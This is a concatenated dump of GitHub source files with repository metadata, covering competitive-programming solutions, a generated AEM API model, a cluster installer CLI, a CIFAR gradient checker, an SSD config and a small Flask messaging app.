d488723716829ac81ed627cfe7e5dbbff81ba6d9 | 1506ff625b6ad1ee7117af54044acd72dc6f5c81 | /Arboles/Agra set 1/emails.py | 921246cdb6766a271377404c64cdb2d81d797aef | [] | no_license | Nicortiz72/ICPC_AlgorithmsProblems | a4e7c1bf2b4f7804c1c7da61e39e775c4bc6a5ae | 462b1e696d8c9e27a0363eb257dfce7e2c580306 | refs/heads/master | 2023-07-12T10:14:30.609834 | 2021-08-16T17:55:10 | 2021-08-16T17:55:10 | 291,610,647 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 990 | py | from sys import stdin
visited=None
vis=1
def dfs(E,v,Dis):
global visited,vis
stack=[v]
q=v
Dis[v]=-1
visited[q]=vis
cont=1
while(visited[E[q]]!=vis):
visited[E[q]]=vis
cont+=1
q=E[q]
Dis[q]=-1
stack.append(q)
if(Dis[E[q]]==-1):
q1=stack.pop()
while(q1!=E[q]):
Dis[q1]=cont
q1=stack.pop()
Dis[E[q]]=cont
while(len(stack)!=0):
q1=stack.pop()
Dis[q1]=Dis[E[q1]]+1
return Dis
def solve(E):
global visited,vis
Dis=[0 for i in range(len(E))]
for i in range(len(E)):
if(visited[i]!=vis):
Dis=dfs(E,i,Dis)
j=0
for i in range(len(Dis)):
if(Dis[j]<Dis[i]):
j=i
return j
#dfs
def main():
global visited,vis
n=int(stdin.readline())
visited=[0 for i in range(50000)]
for i in range(n):
v=int(stdin.readline())
E=[0 for i in range(v)]
for j in range(v):
q1,q2=stdin.readline().split()
E[int(q1)-1]=int(q2)-1
print('Case {0}: {1}'.format(i+1, solve(E)+1))
vis+=1
main()
| [
"noreply@github.com"
] | noreply@github.com |
2235add0ce48477a2a58d68f369f8cd3ba1fbf2b | 5ec06dab1409d790496ce082dacb321392b32fe9 | /clients/python/generated/swaggeraemosgi/model/com_adobe_granite_frags_impl_check_http_header_flag_properties.py | b32110895772ddda09288d935ee3f1e98dbd4215 | [
"Apache-2.0"
] | permissive | shinesolutions/swagger-aem-osgi | e9d2385f44bee70e5bbdc0d577e99a9f2525266f | c2f6e076971d2592c1cbd3f70695c679e807396b | refs/heads/master | 2022-10-29T13:07:40.422092 | 2021-04-09T07:46:03 | 2021-04-09T07:46:03 | 190,217,155 | 3 | 3 | Apache-2.0 | 2022-10-05T03:26:20 | 2019-06-04T14:23:28 | null | UTF-8 | Python | false | false | 7,658 | py | """
Adobe Experience Manager OSGI config (AEM) API
Swagger AEM OSGI is an OpenAPI specification for Adobe Experience Manager (AEM) OSGI Configurations API # noqa: E501
The version of the OpenAPI document: 1.0.0-pre.0
Contact: opensource@shinesolutions.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
import nulltype # noqa: F401
from swaggeraemosgi.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from swaggeraemosgi.model.config_node_property_string import ConfigNodePropertyString
globals()['ConfigNodePropertyString'] = ConfigNodePropertyString
class ComAdobeGraniteFragsImplCheckHttpHeaderFlagProperties(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'feature_name': (ConfigNodePropertyString,), # noqa: E501
'feature_description': (ConfigNodePropertyString,), # noqa: E501
'http_header_name': (ConfigNodePropertyString,), # noqa: E501
'http_header_valuepattern': (ConfigNodePropertyString,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'feature_name': 'feature.name', # noqa: E501
'feature_description': 'feature.description', # noqa: E501
'http_header_name': 'http.header.name', # noqa: E501
'http_header_valuepattern': 'http.header.valuepattern', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""ComAdobeGraniteFragsImplCheckHttpHeaderFlagProperties - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
feature_name (ConfigNodePropertyString): [optional] # noqa: E501
feature_description (ConfigNodePropertyString): [optional] # noqa: E501
http_header_name (ConfigNodePropertyString): [optional] # noqa: E501
http_header_valuepattern (ConfigNodePropertyString): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
| [
"cliffano@gmail.com"
] | cliffano@gmail.com |
cf400b74f8333bd94a8076b1ce28d603b859639b | f8eefef177c4794392ddbad008a67b10e14cb357 | /platform/source/tools/clustercli/installer.py | 8e7b6782155ff0f9197900416768d8643f903298 | [
"Apache-2.0"
] | permissive | durgeshsanagaram/argo | 8c667c7e64721f149194950f0d75b27efe091f50 | 8601d652476cd30457961aaf9feac143fd437606 | refs/heads/master | 2021-07-10T19:44:22.939557 | 2017-10-05T18:02:56 | 2017-10-05T18:02:56 | 105,924,908 | 1 | 0 | null | 2017-10-05T18:22:21 | 2017-10-05T18:22:20 | null | UTF-8 | Python | false | false | 11,381 | py | # -*- coding: utf-8 -*-
#
# Copyright 2015-2017 Applatix, Inc. All rights reserved.
#
import os
import re
from anytree import Node
from ax.cloud.aws import EC2
from .common import CommonPrompts
from prompt_toolkit.history import FileHistory
from ax.platform.cluster_config import AXClusterSize, AXClusterType
from ax.cluster_management.app.options.install_options import ClusterInstallDefaults
from ax.platform.cluster_config import SpotInstanceOption
class InstallPrompts(CommonPrompts):
INSTALLCMD = "install"
UNINSTALLCMD = "uninstall"
def __init__(self, cmd=INSTALLCMD):
super(InstallPrompts, self).__init__()
shell_dir = os.path.expanduser("~/.argo/")
self.history = FileHistory(os.path.join(shell_dir, ".history_install"))
sizeNode = Node("size",
prompt=u'Enter the size of the cluster',
values=AXClusterSize.VALID_CLUSTER_SIZES,
help=u'Choose a size for the cluster. See argo documentation for what these sizes mean',
default=ClusterInstallDefaults.CLUSTER_SIZE,
parent=self.get_root())
typeNode = Node("type",
prompt=u'Enter type of node in the cluster',
values=AXClusterType.VALID_CLUSTER_TYPES,
default=ClusterInstallDefaults.CLUSTER_TYPE,
help=u'Type of node in cluster.',
parent=sizeNode
)
regionNode = Node("region",
prompt=u'Enter the region to install the cluster in',
default=self._get_region_from_profile,
values=self._get_all_regions,
parent=self.get_node("profile")
)
placementNode = Node("placement",
prompt=u'Enter the placement in the region',
values=self._get_placement,
parent=regionNode,
help=u'Select the placement in the region, Press tab to see list of possible values'
)
vpcCidrNode = Node("vpccidr",
prompt=u'Enter the VPC CIDR base',
help=u'Please provide a /16 CIDR base for your new VPC. For example, if you want your VPC CIDR to be \"172.20.0.0/16\", enter 172.20',
validator=self._vpc_validator,
default=ClusterInstallDefaults.VPC_CIDR_BASE,
parent=typeNode
)
subnetMaskNode = Node("subnet_mask",
prompt=u'Enter a subnet mask (Cannot be greater than 25)',
help=u'An integer value that is in the range [0-25]',
validator=self._subnet_validator,
default=ClusterInstallDefaults.SUBNET_MASK_SIZE,
parent=vpcCidrNode
)
trustedCidrsNode = Node("trusted_cidrs",
prompt=u'Enter a list of trusted CIDRs separted by space',
default=u' '.join(ClusterInstallDefaults.TRUSTED_CIDR),
help=u'E.g. 10.0.0.1/32 10.1.1.0/32',
validator=self._trusted_cidr_validator,
parent=typeNode
)
spotOption = Node("spot_type",
prompt=u'Enter the configuration of spot instances (see toolbar for options)',
help=u'all: Every instance is a spot instance (cost effective), none: Every instance is on-demand (stable node), partial: argo services run on on-demand nodes other run on spot (compromise)',
default=ClusterInstallDefaults.SPOT_INSTANCE_OPTION,
values=SpotInstanceOption.VALID_SPOT_INSTANCE_OPTIONS,
parent=typeNode,
function=self._should_ask_user_on_demand
)
numberOnDemandNode = Node("num_on_demand",
prompt=u'Number of on-demand nodes for running workflows',
default=unicode(ClusterInstallDefaults.USER_ON_DEMAND_NODE_COUNT),
parent=spotOption,
validator=self._on_demand_validator
)
def get_argocluster_command(self):
command = "argocluster install --cluster-name {name} --cloud-provider aws --cloud-profile {profile} --cluster-size {size} --cluster-type {type} " \
"--cloud-region {region} --cloud-placement {placement} --vpc-cidr-base {vpc_base} --subnet-mask-size {subnet_mask} --trusted-cidrs {cidrs} " \
"--spot-instances-option {spot_option} --user-on-demand-nodes={demand_nodes} --silent".format(
name=self.get_value("name"),
profile=self.get_value("profile"),
size=self.get_value("size"),
type=self.get_value("type"),
region=self.get_value("region"),
placement=self.get_value("placement"),
vpc_base=self.get_value("vpccidr"),
subnet_mask=self.get_value("subnet_mask"),
cidrs=self.get_value("trusted_cidrs"),
spot_option=self.get_value("spot_type"),
demand_nodes=self.get_value("num_on_demand", default=0)
)
return command
def get_root(self):
return self.root
def get_history(self):
return self.history
def get_header(self):
return u'Interactive Cluster Installation'
@staticmethod
def _get_region_from_profile(node):
profiles = InstallPrompts._get_profiles()
profile_name = node.parent.value
region = profiles[profile_name].get("region", None)
if not region:
return u''
return region
@staticmethod
def _get_all_regions(node):
try:
import boto3
ec2 = boto3.client("ec2")
regions = ec2.describe_regions()
return [x['RegionName'] for x in regions['Regions']]
except Exception as e:
print("Could not get Regions due to error {}".format(e))
return []
@staticmethod
def _get_placement(node):
# node's parent is region and region's parent is profile
region = node.parent.value
profile = node.parent.parent.value
try:
ec2 = EC2(profile=profile, region=region)
zones = ec2.get_availability_zones()
return zones
except Exception as e:
print ("Could not get availability zones for profile {} region {}. Are you sure, that the region exists?".format(profile, region))
return []
@staticmethod
def _vpc_validator(input):
match = re.match(r"^([0-9]{1,3})\.([0-9]{1,3})$", input)
if not match:
raise ValueError("Not a valid CIDR/16")
if int(match.group(1)) >= 256 or int(match.group(2)) >= 256:
raise ValueError("CIDR entries need to be in 0-255 range")
@staticmethod
def _subnet_validator(input):
if int(input) < 0 or int(input) > 25:
raise ValueError("Subnet mask needs to be in range of [0-25]")
@staticmethod
def _should_ask_user_on_demand(user_input):
if user_input == "partial":
return user_input, True
else:
return user_input, False
@staticmethod
def _trusted_cidr_validator(input):
from netaddr import IPAddress
ret = []
for cidr in input.split(" "):
cidr = cidr.strip()
if not cidr:
# skip whitespace
continue
ip, mask = cidr.split("/")
if int(mask) < 0 or int(mask) > 32:
raise ValueError("CIDR {} is not valid as mask {} is not in range [0-32]".format(cidr, mask))
if ip != "0.0.0.0" or mask != '0':
ipaddr = IPAddress(ip)
if ipaddr.is_netmask():
raise ValueError("Trusted CIDR {} should not be a net mask".format(ip))
if ipaddr.is_hostmask():
raise ValueError("Trusted CIDR {} should not be a host mask".format(ip))
if ipaddr.is_reserved():
raise ValueError("Trusted CIDR {} should not be in reserved range".format(ip))
if ipaddr.is_loopback():
raise ValueError("Trusted CIDR {} should not be a loop back address".format(ip))
# Currently we don't support private VPC
if ipaddr.is_private():
raise ValueError("Trusted CIDR {} should not be a private address".format(ip))
ret.append(cidr)
return ret
@staticmethod
def _on_demand_validator(input):
val = int(input)
# TODO: Figure out how to use value of cluster size
if val < 0 or val > 30:
raise ValueError("Need to have a value between 0-30")
class UninstallPrompts(CommonPrompts):
def __init__(self):
super(UninstallPrompts, self).__init__()
shell_dir = os.path.expanduser("~/.argo/")
self.history = FileHistory(os.path.join(shell_dir, ".history_uninstall"))
def get_history(self):
return self.history
def get_header(self):
return u'Options for deleting your cluster'
def get_argocluster_command(self):
command = "argocluster uninstall --cluster-name {name} --cloud-provider aws --cloud-profile {profile} --silent".format(
name=self.get_value("name"),
profile=self.get_value("profile")
)
return command
class PausePrompts(CommonPrompts):
def __init__(self):
super(PausePrompts, self).__init__()
shell_dir = os.path.expanduser("~/.argo/")
self.history = FileHistory(os.path.join(shell_dir, ".history_pause"))
def get_history(self):
return self.history
def get_header(self):
return u'Options for pausing your cluster'
def get_argocluster_command(self):
command = "argocluster pause --cluster-name {name} --cloud-provider aws --cloud-profile {profile} --silent".format(
name=self.get_value("name"),
profile=self.get_value("profile")
)
return command
class ResumePrompts(CommonPrompts):
def __init__(self):
super(ResumePrompts, self).__init__()
shell_dir = os.path.expanduser("~/.argo/")
self.history = FileHistory(os.path.join(shell_dir, ".history_resume"))
def get_history(self):
return self.history
def get_header(self):
return u'Options for resuming your cluster'
def get_argocluster_command(self):
command = "argocluster resume --cluster-name {name} --cloud-provider aws --cloud-profile {profile} --silent".format(
name=self.get_value("name"),
profile=self.get_value("profile")
)
return command
| [
"abhinav.das@gmail.com"
] | abhinav.das@gmail.com |
ed04a9cd876557388460983a68bf2f02e039d5c6 | 023415cd478c85ed387b28ed3903208ebdd21789 | /register_env/bin/flask | 260bc23c122eff78c2e451471887202c2f7e4980 | [] | no_license | kartik1695/Basic_form | 6c75c217d7786e68f707ccb279e25cf109bc0022 | a4c5718b81a55c6f3cbfc3d4988ed03875162d76 | refs/heads/main | 2023-05-11T06:23:54.170372 | 2021-06-06T07:20:50 | 2021-06-06T07:20:50 | 374,294,343 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | #!/home/kartik/Documents/register-app/register_env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from flask.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"keswanikartik1695@gmail.com"
] | keswanikartik1695@gmail.com | |
5ebc5ffb780f550289159f7c9c67eb58138d96ee | 236a10f814d1b8ef90c90097b738e64566873a08 | /001TwoSum.py | 9c0444d40e00058b3dce68c1aae874704fe95a37 | [] | no_license | cocowindwebster/PythonLeet1 | cb75ab4e85694b36c8d56ad2629ef61f5fb10051 | dffe615edd36eca48d16ac9d4b660de68f2030f7 | refs/heads/master | 2021-01-10T13:15:41.830320 | 2016-05-09T00:59:43 | 2016-05-09T00:59:43 | 51,130,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | class Solution(object):
def twoSum(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
result = []
dict = {}
if nums == None or len(nums) == 0:
return result
for index in range(len(nums)):
if target - nums[index] in dict:
result.append(dict.get(target - nums[index]))
result.append(index)
#ERROR1 不能合并写,append()并不return the list
#result.append(dict.get(target - nums[index])).append(index)
return result
else :
dict[nums[index]] = index
return result
| [
"cocowindwebster@gmail.com"
] | cocowindwebster@gmail.com |
4cd143f4bb98d8b0bbb11a52b5e1b6d5bf550968 | 0fa976c47615fea486e43b1b09e0a36eb2f0c734 | /lab2/gradientchecking.py | 3b4d8db4f88e915fb558fe0fbc2659082f17351e | [] | no_license | baldassarreFe/dd2424-deep-learning | 757b2c294cd206d2de031b24b3ad8e759fd64f01 | b82fc8249885d133518f664976112d75db20ff16 | refs/heads/master | 2022-10-26T12:26:53.341390 | 2019-03-13T13:30:14 | 2019-03-13T13:30:14 | 86,454,128 | 1 | 5 | null | 2022-10-10T07:30:24 | 2017-03-28T11:52:57 | Jupyter Notebook | UTF-8 | Python | false | false | 4,214 | py | import numpy as np
from tqdm import tqdm
from network import Network
def compute_grads_for_matrix(one_hot_targets, inputs,
matrix, network: Network,
initial_cost):
# Initialize an empty matrix to contain the gradients
grad = np.zeros_like(matrix)
h = 1e-6 # np.finfo(float).eps
# Iterate over the matrix changing one entry at the time
desc = 'Gradient computations for a {} matrix, {} samples' \
.format(matrix.shape, inputs.shape[1])
with tqdm(desc=desc, total=matrix.size) as progress_bar:
for i in range(matrix.shape[0]):
for j in range(matrix.shape[1]):
matrix[i, j] += h
final_cost = network.cost(one_hot_targets, inputs)
grad[i, j] = (final_cost - initial_cost) / h
matrix[i, j] -= h
progress_bar.update()
return grad
def print_grad_diff(grad, grad_num, title='Gradient difference'):
print(title)
print('- sum of abs differences: {:.3e}'.format(np.abs(grad - grad_num).sum()))
print('- mean of abs values grad: {:.3e} grad_num: {:.3e}'
.format(np.abs(grad).mean(), np.abs(grad_num).mean()))
print('- min of abs values grad: {:.3e} grad_num: {:.3e}'
.format(np.abs(grad).min(), np.abs(grad_num).min()))
print('- max of abs values grad: {:.3e} grad_num: {:.3e}'
.format(np.abs(grad).max(), np.abs(grad_num).max()))
if __name__ == '__main__':
import layers
import initializers
import datasets
cifar = datasets.CIFAR10()
training = cifar.get_named_batches('data_batch_1').subset(50)
# One layer network with regularization
net = Network()
linear = layers.Linear(cifar.input_size, cifar.output_size, 0.2, initializers.Xavier())
net.add_layer(linear)
net.add_layer(layers.Softmax(cifar.output_size))
outputs = net.evaluate(training.images)
net.backward(training.one_hot_labels)
cost = net.cost(training.one_hot_labels, outputs=outputs)
# Weights matrix
grad_num = compute_grads_for_matrix(training.one_hot_labels,
training.images,
linear.W, net, cost)
print_grad_diff(linear.grad_W, grad_num, 'Grad W')
# Biases matrix
grad_num = compute_grads_for_matrix(training.one_hot_labels,
training.images,
linear.b, net, cost)
print_grad_diff(linear.grad_b, grad_num, 'Grad b')
# Two layer network with regularization
net = Network()
linear1 = layers.Linear(cifar.input_size, 15, 0.1, initializers.Xavier(), name='Linear 1')
net.add_layer(linear1)
net.add_layer(layers.ReLU(15))
linear2 = layers.Linear(15, cifar.output_size, 0.3, initializers.Xavier(), name='Linear 2')
net.add_layer(linear2)
net.add_layer(layers.Softmax(cifar.output_size))
outputs = net.evaluate(training.images)
net.backward(training.one_hot_labels)
cost = net.cost(training.one_hot_labels, outputs=outputs)
# Weights matrix, layer 1
grad_num = compute_grads_for_matrix(training.one_hot_labels,
training.images,
linear1.W, net, cost)
print_grad_diff(linear1.grad_W, grad_num, 'Grad W1')
# Biases matrix, layer 1
grad_num = compute_grads_for_matrix(training.one_hot_labels,
training.images,
linear1.b, net, cost)
print_grad_diff(linear1.grad_b, grad_num, 'Grad b1')
# Weights matrix, layer 2
grad_num = compute_grads_for_matrix(training.one_hot_labels,
training.images,
linear2.W, net, cost)
print_grad_diff(linear2.grad_W, grad_num, 'Grad W2')
# Biases matrix, layer 2
grad_num = compute_grads_for_matrix(training.one_hot_labels,
training.images,
linear2.b, net, cost)
print_grad_diff(linear2.grad_b, grad_num, 'Grad b2')
| [
"baldassarre.fe@gmail.com"
] | baldassarre.fe@gmail.com |
5ba52ff24e624806eae6fe605a2683ec81aef369 | 6792ef0520c599aeacded498bb359bcd715a5a51 | /src/1000_Prime_number.py | 5eb66d42576e03a99bf7dcfd671b82d116a398cf | [] | no_license | palmieriang/Python_exercise | 3d39d7fbe5ff3189811c5a718a9fe48c40a72226 | 159d1842f9f60ee944d2e9124ca48b7ff967dcf7 | refs/heads/master | 2021-01-17T15:13:02.234707 | 2017-04-04T21:40:34 | 2017-04-04T21:40:34 | 56,397,601 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,455 | py | """
prime_numbers.py
Created by Angelo Palmieri
"""
def is_prime_func(number):
'''
Takes in a Number and determines if it is a Prime Number
Args: A Number
Returns: True or False
'''
is_prime = True
n = abs(int(number)) # make sure n is a positive integer
if n < 2: # 0 and 1 are not primes
is_prime = False
elif n == 2: # 2 is the only even prime number
is_prime = True
elif n % 2 == 0:
is_prime = False
else:
# range starts with 3 and only needs to go up the squareroot
# of n for all odd numbers
for x in range(3, int(n**0.5)+1, 2):
if n % x == 0:
is_prime = False
return is_prime
def find_1000_prime():
'''
Finds what the 1000th Prime number is
Args: None
Returns: The 1000th Prime Number
'''
current_number = 2
count = 0
while True:
is_prime = is_prime_func(current_number)
if is_prime:
count += 1
if count == 1000:
return current_number
else:
current_number += 1
def main():
print 'Prime Numbers'
print '='*40
print ''
thous_prime = find_1000_prime()
if thous_prime:
print ''
print 'The 1000th Prime Number is:', int(thous_prime)
else:
print 'Sorry, Error Occurred'
if __name__ == '__main__':
main()
| [
"palmieri.ang@gmail.com"
] | palmieri.ang@gmail.com |
cc13ede1a5694d6051f80c5c4d867d56bd7ef003 | 7071dce3556cc2a4c1735de7e94e6ff41ba169f9 | /blog/views.py | 87a359a9d069b02a3ba9eb7347ed807c204f5d36 | [] | no_license | gauravsonthalia/Django_ecommerce | a0a89470b87af59c9b5aa00808d49ca55b024929 | 6e63d8bf7d5e7f33255d88dfb120e7cd26896023 | refs/heads/master | 2022-04-18T03:55:20.584975 | 2020-04-18T14:53:00 | 2020-04-18T14:53:00 | 254,911,600 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | from django.shortcuts import render
from django.http import HttpResponse
from .models import Blogpost
def index (request):
blog= Blogpost.objects.all()
return render(request,'blog/index.html', {'blog':blog})
def blogpost (request, id):
post = Blogpost.objects.filter(post_id = id)[0]
print (post)
return render(request,'blog/blogpost.html', {'post': post}) | [
"grvsonthalia@gmail.com"
] | grvsonthalia@gmail.com |
58f9a9326020492f50026e590db6446fbaea096a | 87f0fbf9b9b369d4e73854a5e6bd426564fae2f2 | /COMPONENTE_PRACTICO/Sesion14_Semana5/CP_SESION14_SOLUCION/app.py | 8fb225d1d37a16777f3ace179888e1448ccd8343 | [] | no_license | MISIONTIC-UN-2022/CICLO-III | 8d995dcc0b291dfad9eec96ae783ec8b441b42fc | 5fc5d8715e55b8048e506e31bf4417badd287b66 | refs/heads/main | 2023-08-14T00:00:42.423574 | 2021-10-19T16:08:29 | 2021-10-19T16:08:29 | 399,984,007 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 7,279 | py | import functools
import os
from re import X
from flask import Flask, render_template, flash, request, redirect, url_for, session, send_file, current_app, g, make_response
import utils
from db import get_db, close_db
from werkzeug.security import generate_password_hash, check_password_hash
from formulario import Contactenos
from message import mensajes
app = Flask( __name__ )
app.secret_key = os.urandom( 24 )
@app.route( '/' )
def index():
if g.user:
return redirect( url_for( 'send' ) )
return render_template( 'login.html' )
@app.route( '/register', methods=('GET', 'POST') )
def register():
if g.user:
return redirect( url_for( 'send' ) )
try:
if request.method == 'POST':
name= request.form['nombre']
username = request.form['username']
password = request.form['password']
email = request.form['correo']
error = None
db = get_db()
if not utils.isUsernameValid( username ):
error = "El usuario debe ser alfanumerico o incluir solo '.','_','-'"
flash( error )
return render_template( 'register.html' )
if not utils.isPasswordValid( password ):
error = 'La contraseña debe contenir al menos una minúscula, una mayúscula, un número y 8 caracteres'
flash( error )
return render_template( 'register.html' )
if not utils.isEmailValid( email ):
error = 'Correo invalido'
flash( error )
return render_template( 'register.html' )
if db.execute( 'SELECT id FROM usuario WHERE correo = ?', (email,) ).fetchone() is not None:
error = 'El correo ya existe'.format( email )
flash( error )
return render_template( 'register.html' )
db.execute(
'INSERT INTO usuario (nombre, usuario, correo, contraseña) VALUES (?,?,?,?)',
(name, username, email, generate_password_hash(password))
)
db.commit()
# yag = yagmail.SMTP('micuenta@gmail.com', 'clave') #modificar con tu informacion personal
# yag.send(to=email, subject='Activa tu cuenta',
# contents='Bienvenido, usa este link para activar tu cuenta ')
flash( 'Revisa tu correo para activar tu cuenta' )
return redirect( 'login' )
return render_template( 'register.html' )
except:
return render_template( 'register.html' )
@app.route( '/login', methods=('GET', 'POST') )
def login():
try:
if g.user:
return redirect( url_for( 'send' ) )
if request.method == 'POST':
db = get_db()
error = None
username = request.form['username']
password = request.form['password']
if not username:
error = 'Debes ingresar el usuario'
flash( error )
return render_template( 'login.html' )
if not password:
error = 'Contraseña requerida'
flash( error )
return render_template( 'login.html' )
user = db.execute(
'SELECT * FROM usuario WHERE usuario = ? AND contraseña = ?', (username, password)
).fetchone()
if user is None:
user = db.execute(
'SELECT * FROM usuario WHERE usuario = ?', (username,)
).fetchone()
if user is None:
error = 'Usuario no existe'
else:
#Validar contraseña hash
store_password = user[4]
result = check_password_hash(store_password, password)
if result is False:
error = 'Contraseña inválida'
else:
session.clear()
session['user_id'] = user[0]
resp = make_response( redirect( url_for( 'send' ) ) )
resp.set_cookie( 'username', username )
return resp
flash( error )
else:
session.clear()
session['user_id'] = user[0]
return redirect( url_for( 'send' ) )
flash( error )
close_db()
return render_template( 'login.html' )
except Exception as e:
print(e)
return render_template( 'login.html' )
@app.route( '/contacto', methods=('GET', 'POST') )
def contacto():
form = Contactenos()
return render_template( 'contacto.html', titulo='Contactenos', form=form )
def login_required(view):
@functools.wraps( view )
def wrapped_view(**kwargs):
if g.user is None:
return redirect( url_for( 'login' ) )
return view( **kwargs )
return wrapped_view
@app.route( '/downloadpdf', methods=('GET', 'POST') )
# @login_required
def downloadpdf():
return send_file( "resources/doc.pdf", as_attachment=True )
@app.route( '/downloadimage', methods=('GET', 'POST') )
@login_required
def downloadimage():
return send_file( "resources/image.png", as_attachment=True )
@app.route( '/send', methods=('GET', 'POST') )
@login_required
def send():
if request.method == 'POST':
from_id = g.user['id']
to_username = request.form['para']
subject = request.form['asunto']
body = request.form['mensaje']
db = get_db()
if not to_username:
flash( 'Para campo requerido' );
return render_template( 'send.html' )
if not subject:
flash( 'Asunto es requerido' );
return render_template( 'send.html' )
if not body:
flash( 'Mensaje es requerido' );
return render_template( 'send.html' )
error = None
userto = None
userto = db.execute(
'SELECT * FROM usuario WHERE usuario = ?', (to_username,)
).fetchone()
if userto is None:
error = 'No existe ese usuario'
if error is not None:
flash( error )
else:
db = get_db()
db.execute(
'INSERT INTO mensajes (from_id, to_id, asunto, mensaje)'
' VALUES (?, ?, ?, ?)',
(g.user['id'], userto['id'], subject, body)
)
db.commit()
close_db()
flash( "Mensaje Enviado" )
return render_template( 'send.html' )
@app.before_request
def load_logged_in_user():
user_id = session.get( 'user_id' )
if user_id is None:
g.user = None
else:
g.user = get_db().execute(
'SELECT * FROM usuario WHERE id = ?', (user_id,)
).fetchone()
@app.route( '/logout' )
def logout():
session.clear()
return redirect( url_for( 'login' ) )
if __name__ == '__main__':
app.run()
| [
"kristell.urueta@gmail.com"
] | kristell.urueta@gmail.com |
25b61e304b936c5e84ffe57f9d196cca268179ff | 63b864deda44120067eff632bbb4969ef56dd573 | /object_detection/ssd/Config.py | f444dc728514a6492170e0eaf1c5d65542716889 | [] | no_license | lizhe960118/Deep-Learning | d134592c327decc1db12cbe19d9a1c85a5056086 | 7d2c4f3a0512ce4bd2f86c9f455da9866d16dc3b | refs/heads/master | 2021-10-29T06:15:04.749917 | 2019-07-19T15:27:25 | 2019-07-19T15:27:25 | 152,355,392 | 5 | 2 | null | 2021-10-12T22:19:33 | 2018-10-10T03:06:44 | Jupyter Notebook | UTF-8 | Python | false | false | 481 | py | import os.path as osp
sk = [ 15, 30, 60, 111, 162, 213, 264 ]
feature_map = [ 38, 19, 10, 5, 3, 1 ]
steps = [ 8, 16, 32, 64, 100, 300 ]
image_size = 300
aspect_ratios = [[2], [2, 3], [2, 3], [2, 3], [2], [2]]
MEANS = (104, 117, 123)
batch_size = 2
data_load_number_worker = 0
lr = 1e-3
momentum = 0.9
weight_decacy = 5e-4
gamma = 0.1
VOC_ROOT = osp.join('./', "VOCdevkit/")
dataset_root = VOC_ROOT
use_cuda = True
lr_steps = (80000, 100000, 120000)
max_iter = 120000
class_num = 21 | [
"2957308424@qq.com"
] | 2957308424@qq.com |
194313e9c4f2285199f26b879ee699f19596d0ff | dcf1f1075ce351913cb50e2aadf163eb857a6951 | /adder.py | 19908c616a624c89076ff5ece796e760d21137a3 | [
"MIT"
